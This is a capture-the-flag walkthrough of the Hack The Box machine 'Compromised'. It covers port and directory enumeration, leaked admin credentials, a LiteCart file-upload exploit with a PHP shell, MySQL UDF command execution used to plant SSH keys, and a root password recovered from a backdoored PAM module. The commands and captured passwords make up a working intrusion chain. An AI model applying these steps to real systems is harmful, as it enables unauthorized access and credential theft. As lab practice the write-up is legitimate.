NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 21:00 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
Initiating Ping Scan at 21:00
Scanning 10.10.10.207 [4 ports]
Completed Ping Scan at 21:00, 0.34s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:00
Scanning compromised.htb (10.10.10.207) [1000 ports]
Discovered open port 80/tcp on 10.10.10.207
Discovered open port 22/tcp on 10.10.10.207
Completed SYN Stealth Scan at 21:01, 15.68s elapsed (1000 total ports)
Initiating Service scan at 21:01
Scanning 2 services on compromised.htb (10.10.10.207)
Completed Service scan at 21:01, 6.57s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against compromised.htb (10.10.10.207)
Retrying OS detection (try #2) against compromised.htb (10.10.10.207)
Initiating Traceroute at 21:01
Completed Traceroute at 21:01, 0.29s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 21:01
Completed Parallel DNS resolution of 2 hosts. at 21:01, 0.16s elapsed
NSE: Script scanning 10.10.10.207.
Initiating NSE at 21:01
Completed NSE at 21:01, 8.43s elapsed
Initiating NSE at 21:01
Completed NSE at 21:01, 1.13s elapsed
Initiating NSE at 21:01
Completed NSE at 21:01, 0.00s elapsed
Nmap scan report for compromised.htb (10.10.10.207)
Host is up (0.28s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:da:5c:8e:8e:fb:8e:75:27:4a:b9:2a:59:cd:4b:cb (RSA)
| 256 d5:c5:b3:0d:c8:b6:69:e4:fb:13:a3:81:4a:15:16:d2 (ECDSA)
|_ 256 35:6a:ee:af:dc:f8:5e:67:0d:bb:f3:ab:18:64:47:90 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: FD8AFB6FFE392F9ED98CC0B1B37B9A5D
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Legitimate Rubber Ducks | Online Store
|_Requested resource was http://compromised.htb/shop/en/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 - 3.1 (86%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 35.219 days (since Mon Aug 10 15:46:07 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 278.78 ms 10.10.14.1
2 278.87 ms compromised.htb (10.10.10.207)
NSE: Script Post-scanning.
Initiating NSE at 21:01
Completed NSE at 21:01, 0.00s elapsed
Initiating NSE at 21:01
Completed NSE at 21:01, 0.00s elapsed
Initiating NSE at 21:01
Completed NSE at 21:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.99 seconds
Raw packets sent: 2088 (95.460KB) | Rcvd: 42 (2.536KB)
PORT 80
Lets use gobuster
┌─[root@liquid]─[~] └──╼ #gobuster dir -u http://10.10.10.207 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.207 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/09/14 21:02:13 Starting gobuster =============================================================== /.hta (Status: 403) /.htpasswd (Status: 403) /.htaccess (Status: 403) /backup (Status: 301) /index.php (Status: 302) /server-status (Status: 403) /shop (Status: 301) =============================================================== 2020/09/14 21:04:24 Finished ===============================================================
Got some directory named BACKUP
So lets get that out!!!
It is a backup folder of website
where we could find data which could help in foothold
Here we have some directory named /.log2301c9430d8593ae.txt
So lets go to this directory
User: admin Passwd: theNextGenSt0r3!~
Here we got creds
Lets enumerate through more files
Here we will see salt hash in includes directory and admin creds which we already got
password salt hash database password
Here we got admin now we need exploit for litecart
┌─[✗]─[root@liquid]─[~/Desktop/HTB/compromise] └──╼ #python 45267.py -t http://10.10.10.207/shop/admin -u admin -p 'theNextGenSt0r3!~'
Here exploit will work but could not get shell
So we will be using this but we cannot get shell if you see so lets just do it manually as given in exploit
Here we see that phpinfo is working but not commands and all so we need other script for this to work but also we have to change application/x-php to application/xml in burp so that we could upload it as we can see in exploit we found from exploit-db so it could upload shell but cannot run shell commands
Lets figure this out we have a script for this php exploit which could work
here we have exploit.php which will work here you will just need to change value in pwn(“id”)
SO just upload this same as we did for phpinfo then you just need to navigate to file and run this
http://10.10.10.207/shop/vqmod/xml/exploit.php
Here you will see this
Now we cannot get shell as we dont have bash execution so we need to get everything from here only
as we can see /etc/passwd also that mysql has bash and we also got creds for its database
So for now we have only mysql creds to be used lets use that database and get more data
Here i had to take help from my discord friend
mysql -u root -pchangethis -e “SELECT * FROM mysql.func;
so lest run some commands
main format for mysql command part is that we can exec command as we know so its format would be like this
mysql -u root -pchangethis -e “SELECT trim(trailing char(0x00) from exec_cmd(\”id\”));”
You will see its output as we can execute commands here
So lets insert ssh keys in mysql home directory and use them to get access of mysql user
GETTING USER ACCESS
Generate SSH keys
┌─[root@liquid]─[~/Desktop/HTB/compromise] └──╼ #ssh-keygen -t ed25519 Generating public/private ed25519 key pair. Enter file in which to save the key (/root/.ssh/id_ed25519): /root/Desktop/HTB/compromise/id_rsa Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/Desktop/HTB/compromise/id_rsa Your public key has been saved in /root/Desktop/HTB/compromise/id_rsa.pub The key fingerprint is: SHA256:dhR8pLv+av+8874tQwjdyZNvjGGlFQuFrT/2Rv5v7g4 root@liquid The key's randomart image is: +--[ED25519 256]--+ | .....+o.| | .o....+| | oo o.B | | .....X | | S o. o.* | | . . .. o+=| | . .E+o| | .. .+.*| | .o+o.+#&| +----[SHA256]-----+ ┌─[root@liquid]─[~/Desktop/HTB/compromise] └──╼ #chmod 600 id_rsa ┌─[root@liquid]─[~/Desktop/HTB/compromise] └──╼ #
Copy public key in mysql home directory
mysql -u root -pchangethis -e “SELECT trim(trailing char(0x00) from exec_cmd(\”mkdir -p ~/.ssh; echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKoXKoSkzttsg2CfmG7V51HozuTqgw3sO09YPWlTeuEU root@liquid > ~/.ssh/authorized_keys\”));”
Then trigger it through exploit page
Now just ssh into the machine
┌─[✗]─[root@liquid]─[~/Desktop/HTB/compromise] └──╼ #ssh -i id_rsa mysql@10.10.10.207 Last login: Mon Sep 14 16:58:01 2020 from 10.10.14.201 mysql@compromised:~$ id uid=111(mysql) gid=113(mysql) groups=113(mysql) mysql@compromised:~$ hostname compromised mysql@compromised:~$
Now here we got mysql access but still cannot get user file so as its name is compromise so lets check what files are changed when this machine was compromised
mysql@compromised:~$ dpkg -V 2>/dev/null ??5?????? /boot/System.map-4.15.0-99-generic ??5?????? c /etc/apache2/apache2.conf ??5?????? c /etc/apache2/sites-available/000-default.conf ??5?????? /boot/vmlinuz-4.15.0-101-generic ??5?????? c /etc/sudoers ??5?????? c /etc/sudoers.d/README ??5?????? c /etc/at.deny ??5?????? c /etc/iscsi/iscsid.conf ??5?????? /boot/vmlinuz-4.15.0-99-generic ??5?????? /bin/nc.openbsd ??5?????? /boot/System.map-4.15.0-101-generic ??5?????? /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla ??5?????? /lib/x86_64-linux-gnu/security/pam_unix.so ??5?????? c /etc/apparmor.d/usr.sbin.mysqld ??5?????? c /etc/mysql/mysql.conf.d/mysqld.cnf mysql@compromised:~$
Here we see that number of files were changed but interesting ones are
/lib/x86_64-linux-gnu/security/pam_unix.so
So lets just check this binary here only by using this command
objdump -D /lib/x86_64-linux-gnu/security/pam_unix.so | less
You will see some hex digits
Here in authenticated function we these HEX digit Lets decode them and see what it actually is. it can be done in ghidra also
if we use it as password for root we get authentication error just reverse this in python then again try it for root
>>> "-2m28vnE3U~eklz"[::-1] 'zlke~U3Env82m2-' >>>
GOT ROOT ACCESS
root : zlke~U3Env82m2-
mysql@compromised:~$ su root Password: root@compromised:/var/lib/mysql# cd root@compromised:~# id uid=0(root) gid=0(root) groups=0(root) root@compromised:~# cat /root/root.txt a33163ae366fab6d3ae951e41781c772 root@compromised:~# cat /home/sysadmin/user.txt 94b44b229b50ea261ff73c225dcb6d59 root@compromised:~#
Here we got root access But Still here we have one more way will be adding it up asap !!
2nd Part for user sysadmin access
we have mysql access and we can get sys admin pass through grep command just like this
mysql@compromised:~$ grep -nlri sysadmin strace-log.dat
Now we know the file which contains sysadmin in it lets grep for password in this
mysql@compromised:~$ cat strace-log.dat | grep password
22102 03:11:06 write(2, "mysql -u root --password='3*NLJE"..., 39) = 39
22227 03:11:09 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=3*NLJE32I$Fe"], 0x55bc62467900 /* 21 vars */) = 0
22227 03:11:09 write(2, "[Warning] Using a password on th"..., 73) = 73
22102 03:11:10 write(2, "mysql -u root --password='3*NLJE"..., 39) = 39
22228 03:11:15 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=changeme"], 0x55bc62467900 /* 21 vars */) = 0
22228 03:11:15 write(2, "[Warning] Using a password on th"..., 73) = 73
22102 03:11:16 write(2, "mysql -u root --password='change"..., 35) = 35
22229 03:11:18 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=changethis"], 0x55bc62467900 /* 21 vars */) = 0
22229 03:11:18 write(2, "[Warning] Using a password on th"..., 73) = 73
22232 03:11:52 openat(AT_FDCWD, "/etc/pam.d/common-password", O_RDONLY) = 5
22232 03:11:52 read(5, "#\n# /etc/pam.d/common-password -"..., 4096) = 1440
22232 03:11:52 write(4, "[sudo] password for sysadmin: ", 30) = 30
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
